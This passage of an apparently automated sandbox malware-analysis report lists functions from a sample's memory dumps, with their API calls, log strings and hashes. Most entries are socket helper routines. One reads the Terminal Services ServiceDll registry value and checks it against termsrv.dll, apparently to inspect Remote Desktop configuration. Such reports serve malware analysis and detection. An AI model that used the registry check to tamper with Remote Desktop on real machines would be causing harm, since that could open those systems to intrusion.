API String ID: 4085810780-3386190286
Opcode ID: 5fbb28a5f4c7af40752bc095f375c462acbc214c46beb02d6261729f1a54ccff
Instruction ID: b61386176c2584c8444e8ee932afc73a2809ceb6fea62dbf1d27c2ecf3099d5e
Opcode Fuzzy Hash: 5fbb28a5f4c7af40752bc095f375c462acbc214c46beb02d6261729f1a54ccff
Instruction Fuzzy Hash: 05F05E10E0EE5794EF11ABEBAC406B217685F05BA4F8864B1DD0D1B7B5FD1CB5868740

Function 00007FFE1A5214C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFE1A5214E6
WSAGetLastError.WS2_32 ref: 00007FFE1A521509

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1A52151C
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE1A5214FB
sock_close, xrefs: 00007FFE1A5214F4, 00007FFE1A521515

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastclosesocketfflushfwrite
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
API String ID: 152032778-2221966578
Opcode ID: 6a92f492fd295238fe9017506ac1bb62cf497e7a91884442c598b84fdbedccf9
Instruction ID: 3218d7a389619007e7f7da9c90d8aab710824bda8e8f7de89cf15a9e2f07a11a
Opcode Fuzzy Hash: 6a92f492fd295238fe9017506ac1bb62cf497e7a91884442c598b84fdbedccf9
Instruction Fuzzy Hash: 26F03068F4CE03D1FA1097A7A8500B63651AF67FB9F2403F3D53E555F2AE2CA5468350

Function 00007FFE11BD5DD0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 50stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11BD5192: RegOpenKeyExA.ADVAPI32 ref: 00007FFE11BD51EC

strlen.MSVCRT ref: 00007FFE11BD5E22
strcmp.MSVCRT ref: 00007FFE11BD5E57

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 00007FFE11BD5E00
termsrv.dll, xrefs: 00007FFE11BD5E50
ServiceDll, xrefs: 00007FFE11BD5DF9

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Openstrcmpstrlen
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
API String ID: 679246061-1413152910
Opcode ID: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
Instruction ID: 3653dd31896772ff55e8e0ca07fa01887fd19eafee31a90a21426537afcb9d28
Opcode Fuzzy Hash: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
Instruction Fuzzy Hash: CB215171A1CE87C1EF349F12E440BFA6368AB50369F846072E69D825A9DF3CD545C640

Function 00007FFE11BDACA9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE11BDACCF
WSAGetLastError.WS2_32 ref: 00007FFE11BDACED

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

sock_set_blocking, xrefs: 00007FFE11BDACFD
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11BDAD04

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: a1b16873526868662f2b8e44185e2007aaa97beb29f34de54a1bb7cc9e5aaaa1
Instruction ID: 415217cbb904140da22fc26ab04095b0afd00ebb299407093a05ff544e3b0921
Opcode Fuzzy Hash: a1b16873526868662f2b8e44185e2007aaa97beb29f34de54a1bb7cc9e5aaaa1
Instruction Fuzzy Hash: 2BF0C861A0D903D7FB344F37A8009F55554AB84778F14A275DC2E837B4EE3CA946C701

Function 00007FFE1A4F3F89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE1A4F3FAF
WSAGetLastError.WS2_32 ref: 00007FFE1A4F3FCD

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

sock_set_blocking, xrefs: 00007FFE1A4F3FDD
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A4F3FE4

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: d6c6cff64ba4391655882ee9d1c052582818e9548b27ed4ccd3158a33180697f
Instruction ID: 3ed1ef70f7ffe423058209463106d62282f886301ceb86f12347a4e9c1721ce2
Opcode Fuzzy Hash: d6c6cff64ba4391655882ee9d1c052582818e9548b27ed4ccd3158a33180697f
Instruction Fuzzy Hash: 45F0C861B0CD0342F310571FA8001BA5260AB95FB5F1451F3EC2E837B4DE3CE9568701

Function 00007FFE126E26B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE126E26DF
WSAGetLastError.WS2_32 ref: 00007FFE126E26FD

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

sock_set_blocking, xrefs: 00007FFE126E270D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126E2714

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: a9dc1fb828fe4c8e7d762358f7092c09e209ec3cd2fcb4167166ce423b423755
Instruction ID: c30cab630da52d931c4f21d65c5b39b952e1bcebd6bf9f165ccda5c4a20a4061
Opcode Fuzzy Hash: a9dc1fb828fe4c8e7d762358f7092c09e209ec3cd2fcb4167166ce423b423755
Instruction Fuzzy Hash: 76F062A1F089524AFB109B2BAC101A65261AB947B4F248271EC2D877F4EDBCAD468704

Function 00007FFE1A5213F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE1A52141F
WSAGetLastError.WS2_32 ref: 00007FFE1A52143D

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

sock_set_blocking, xrefs: 00007FFE1A52144D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A521454

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: d54fd1d00f3ce62bae67bc176a96361dc374be5219f58696e23c6c371c470f99
Instruction ID: b3a93f26f7d6e68b3126581f2a483f57ad98e5b8b8b8662a9af72a0ac57c600d
Opcode Fuzzy Hash: d54fd1d00f3ce62bae67bc176a96361dc374be5219f58696e23c6c371c470f99
Instruction Fuzzy Hash: 3CF04F65B0CE0282F31057ABB8001B66561AF96BB5F6442F7ED1D877B4EE3C99468740

Function 00007FFE115056D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE115056FF
WSAGetLastError.WS2_32 ref: 00007FFE1150571D

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

sock_set_blocking, xrefs: 00007FFE1150572D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11505734

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 961ca19562558fabe8a6b4900f284c85b09b59eb7e1769bfcbbad23bf1c4c450
Instruction ID: 2f0e7674710bf924579df8ae88129ae114bd449966d95e7c4e18a61b9db1edfa
Opcode Fuzzy Hash: 961ca19562558fabe8a6b4900f284c85b09b59eb7e1769bfcbbad23bf1c4c450
Instruction Fuzzy Hash: 04F0F661F1CD0282F31047ABA8001BD5669AB847B8F144275EC2E837B4EF7CD84A8701

Function 00007FFE11EC1D99 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE11EC1DBF
WSAGetLastError.WS2_32 ref: 00007FFE11EC1DDD

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC1DF4
sock_set_blocking, xrefs: 00007FFE11EC1DED

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 2d33a153289c306b5fce3851330099b23ac3c9fe11635c37375803fd0bd15f23
Instruction ID: c3059832a71ca8f3b37614c4c8419c76f4f62a31cc914f441e6dc103e457814d
Opcode Fuzzy Hash: 2d33a153289c306b5fce3851330099b23ac3c9fe11635c37375803fd0bd15f23
Instruction Fuzzy Hash: FFF0FC65F0CD4382F710AB9BAC002B75664AB84774F505171ED2D433F4DE3CE8468701

Function 00007FFE11BDADDA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11BDAE0A
WSAGetLastError.WS2_32 ref: 00007FFE11BDAE21

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11BDAE38
tcp_set_nodelay, xrefs: 00007FFE11BDAE31

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: bb85fe7d9bbd166f945c4a08f9790791af09f0990742d847ed14dacead1f49e5
Instruction ID: ac50772d83d428f30fb51b8e7010b874192e3798e4ef9b71f1df103b81fab37e
Opcode Fuzzy Hash: bb85fe7d9bbd166f945c4a08f9790791af09f0990742d847ed14dacead1f49e5
Instruction Fuzzy Hash: 0DF04671A1C952CAE3204F27B800AEA6624AB88374F00A275ED1D837B4DF3CC949CB00

Function 00007FFE1A4F40BA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1A4F40EA
WSAGetLastError.WS2_32 ref: 00007FFE1A4F4101

Strings

tcp_set_nodelay, xrefs: 00007FFE1A4F4111
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A4F4118

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 1af1e0f93fc6dce75bcf80f41e8f45f96a1f3d4645fd1b1a6517dd7bb857d601
Instruction ID: a55e822d218a9ba1518748e62ef43f6d2d0da5d9994a5362778c03ca8923bfb7
Opcode Fuzzy Hash: 1af1e0f93fc6dce75bcf80f41e8f45f96a1f3d4645fd1b1a6517dd7bb857d601
Instruction Fuzzy Hash: 21F0F6A1B0C9028AF3105B2BA8001BA2560AB84F74F1492B2ED1D837F5DE3CD94AC700

Function 00007FFE126E27EA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE126E281A
WSAGetLastError.WS2_32 ref: 00007FFE126E2831

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126E2848
tcp_set_nodelay, xrefs: 00007FFE126E2841

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 055a0c70a428fe6926c8e8ec0572a1c3b8ade905bdfd7429ac0047fc9d7c99a5
Instruction ID: e23dbd5dd46a9a181e9f03d395da1b0b0516c3f649c72da7c3293afac4c6cb89
Opcode Fuzzy Hash: 055a0c70a428fe6926c8e8ec0572a1c3b8ade905bdfd7429ac0047fc9d7c99a5
Instruction Fuzzy Hash: DFF09661B089428AE7109B2BBC105E66661FB887B4F444275ED6D837F8DEBCD94ACB04

Function 00007FFE1A52152A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1A52155A
WSAGetLastError.WS2_32 ref: 00007FFE1A521571

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A521588
tcp_set_nodelay, xrefs: 00007FFE1A521581

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: aa119e89f4cc117f97de9b41f4a7a358675354a59165b15ce94db769aa347d17
Instruction ID: 44200e2ba893f2459427cf218dcbdf597211b0205993e634ee707723bdd489d5
Opcode Fuzzy Hash: aa119e89f4cc117f97de9b41f4a7a358675354a59165b15ce94db769aa347d17
Instruction Fuzzy Hash: 53F0C265B0CA4286F3109B57B8002B66661BBD5BB4F1082F7ED2D837B4DA3CD94A8B00

Function 00007FFE1150580A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1150583A
WSAGetLastError.WS2_32 ref: 00007FFE11505851

Strings

tcp_set_nodelay, xrefs: 00007FFE11505861
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11505868

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 7b795b1efa713698dddd8c652ee4b9cd6c6e1b3637f4f8b0fd21ab21002727b0
Instruction ID: e4968bfd1d1c0b5982369e486cef248462d4029e97222aed336656265340140a
Opcode Fuzzy Hash: 7b795b1efa713698dddd8c652ee4b9cd6c6e1b3637f4f8b0fd21ab21002727b0
Instruction Fuzzy Hash: 7DF02B61B0890286F3105B5BB8042BA6665FB84774F104279ED6D837B4DF7CDA4ACB00

Function 00007FFE11EC1ECA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11EC1EFA
WSAGetLastError.WS2_32 ref: 00007FFE11EC1F11

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC1F28
tcp_set_nodelay, xrefs: 00007FFE11EC1F21

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: a7b5a3e27d61408e24ef4262097601e5cd0ffd2068a5939ebe3b84e33d613beb
Instruction ID: cb2a71b02602d0ab2c0e725a7831b0356faab133829673c196dbf2f364ce400f
Opcode Fuzzy Hash: a7b5a3e27d61408e24ef4262097601e5cd0ffd2068a5939ebe3b84e33d613beb
Instruction Fuzzy Hash: 6CF0F6A2B0C94286F7109BABAC006A76664EB84774F445271EE6D837F4DF3CD546C700

Function 00007FFE1A521596 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1A5215BE
WSAGetLastError.WS2_32 ref: 00007FFE1A5215D5

Strings

tcp_set_keepalive, xrefs: 00007FFE1A5215E5
[E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A5215EC

Memory Dump Source

